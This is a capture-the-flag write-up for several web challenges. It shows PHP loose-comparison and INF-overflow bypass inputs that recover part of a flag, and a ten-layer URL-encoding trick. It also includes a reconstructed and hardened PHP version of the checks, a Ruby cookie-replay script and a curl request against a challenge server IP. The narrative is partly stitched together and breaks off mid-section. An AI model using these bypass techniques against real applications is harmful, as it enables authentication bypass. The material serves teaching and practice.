So let's try to bypass that with null, NaN, an empty string, INF and that kind of thing, using the loose comparison.
If we put a hash that begins with an integer into (log10($a**(0.5)))**2, the number before the first letter is used. E.g. 18ac3e7343f016890c510e93f935261169d9e3f565436429830faf0934f4f8e4 is evaluated as 18. But more importantly, hashes beginning with a letter are evaluated as an infinite float after being injected into the formula.

```
php > var_dump((log10("a1fce4363854ff888cff4b8e7875d600c2682390412a8cf79b37d0b11148b0fa"**(0.5)))**2);
PHP Warning:  A non-numeric value encountered in php shell code on line 1
float(INF)
```
The very big numbers are also generating an INF like 9e99999999999999999999999999999999999999999.
```
php > var_dump((log10(hash("sha256", "y")**(0.5)))**2 == "9e99999999999999999999999999999999999999999");
PHP Warning:  A non-numeric value encountered in php shell code on line 1
bool(true)
php > var_dump((log10(hash("sha256", "y")**(0.5)))**2 == "9e99999999999999999999999999999999999999999" * "9e99999999999999999999999999999999999999999" + "9e99999999999999999999999999999999999999999" * "9e99999999999999999999999999999999999999999");
PHP Warning:  A non-numeric value encountered in php shell code on line 1
bool(true)
```
And the trick is done.
Use val1=y&val2=b&val3=8e99999999999999999999999999999999999999999&val4=9e99999999999999999999999999999999999999999 as params and get the first part of the flag.
pctf{b3_c4r3fu1_duck
The second part is only using $b which is not used in the first part so they are totally independent.
```php
for ($i = 1; $i <= 10; $i++) {
    if ($b == urldecode($b)) die('duck');
    else $b = urldecode($b);
}

if ($b === "WoAHh!") $s2 = "true";
else die('oops..');
```
We just need the final result to be WoAHh! and $b to be able to be urldecoded 10 times.
So let's encode ! as %21 and then % as %25 ten times:
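Both checks above, reproduced as an added example in PHP (not the challenge's own source, which this write-up does not show), with a hardened version of the first one next to the weak one. The function names and the val1/val3/val4 parameter layout are my assumptions, reconstructed from the request used above.

```php
<?php
// Added example (not the challenge's source, which the write-up does not show).
// Assumes PHP 7: a non-numeric string in "**" becomes 0 with an E_WARNING;
// PHP 8 throws a TypeError there instead, so this exact bypass dies on 8.

// First check, reconstructed: the sha256 hex digest goes through the write-up's
// formula and is loosely compared with attacker-chosen numeric strings.
function weak_check(string $val1, string $val3, string $val4): bool
{
    $a = hash('sha256', $val1);            // digest starting with a letter => 0
    $lhs = (log10($a ** 0.5)) ** 2;        // log10(0) = -INF, (-INF) ** 2 = INF
    $rhs = $val3 * $val3 + $val4 * $val4;  // "9e999..." overflows to float(INF)
    return $lhs == $rhs;                   // INF == INF, so true
}

// Hardened form: validate numeric inputs, refuse non-finite intermediates and
// compare strictly. A hex digest has no business in arithmetic at all; the
// formula is kept only to show that is_finite() alone closes the INF trick.
function strict_check(string $val1, string $val3, string $val4): bool
{
    if (!is_numeric($val3) || !is_numeric($val4)) return false;
    $lhs = (float) ((log10(hash('sha256', $val1) ** 0.5)) ** 2);
    $rhs = (float) ($val3 * $val3 + $val4 * $val4);
    return is_finite($lhs) && is_finite($rhs) && $lhs === $rhs;
}

// Second check: $b must change under each of ten urldecode() rounds and end as
// "WoAHh!". Encoding ten times maps "!" to "%21", then each "%" to "%25".
function encode_layers(string $s, int $rounds = 10): string
{
    for ($i = 0; $i < $rounds; $i++) {
        $s = urlencode($s);
    }
    return $s;  // "WoAHh%25252525252525252521" for "WoAHh!"
}

// Mirror of the challenge loop; true where the original would set $s2.
function passes_decode_loop(string $b): bool
{
    for ($i = 1; $i <= 10; $i++) {
        if ($b == urldecode($b)) return false;  // 'duck'
        $b = urldecode($b);
    }
    return $b === "WoAHh!";
}

$big = '9e' . str_repeat('9', 40);                      // numeric, overflows to INF
var_dump(weak_check('y', $big, $big));                  // bool(true)
var_dump(strict_check('y', $big, $big));                // bool(false)
var_dump(passes_decode_loop(encode_layers('WoAHh!')));  // bool(true)
```

Note that if $b arrives through $_GET or $_POST, PHP has already decoded the query string once, so one more encoding layer is consumed before the loop ever runs.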
```ruby
require 'net/http'
require 'uri'

uri = URI('http://159.89.166.12:13500/')
http = Net::HTTP.start(uri.hostname, uri.port)
req = Net::HTTP::Get.new(uri)

cookie = ''
i = 0

# Keep replaying the server's own Set-Cookie value as the flag cookie
# until it has settled on the same value twice in a row.
while true
  req['Cookie'] = 'flag=' + cookie unless cookie.empty?
  res = http.request(req)
  if res.is_a?(Net::HTTPSuccess)
    cookie = res['Set-Cookie'].split('=')[1]
    puts cookie
  end
  if cookie == 'bc54f4d60f1cec0f9a6cb70e13f2127a'
    i += 1
    break if i > 1
  end
end
```
The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.
Just use the fake upload param with curl 'http://159.89.166.12:15000/?profile_pic=':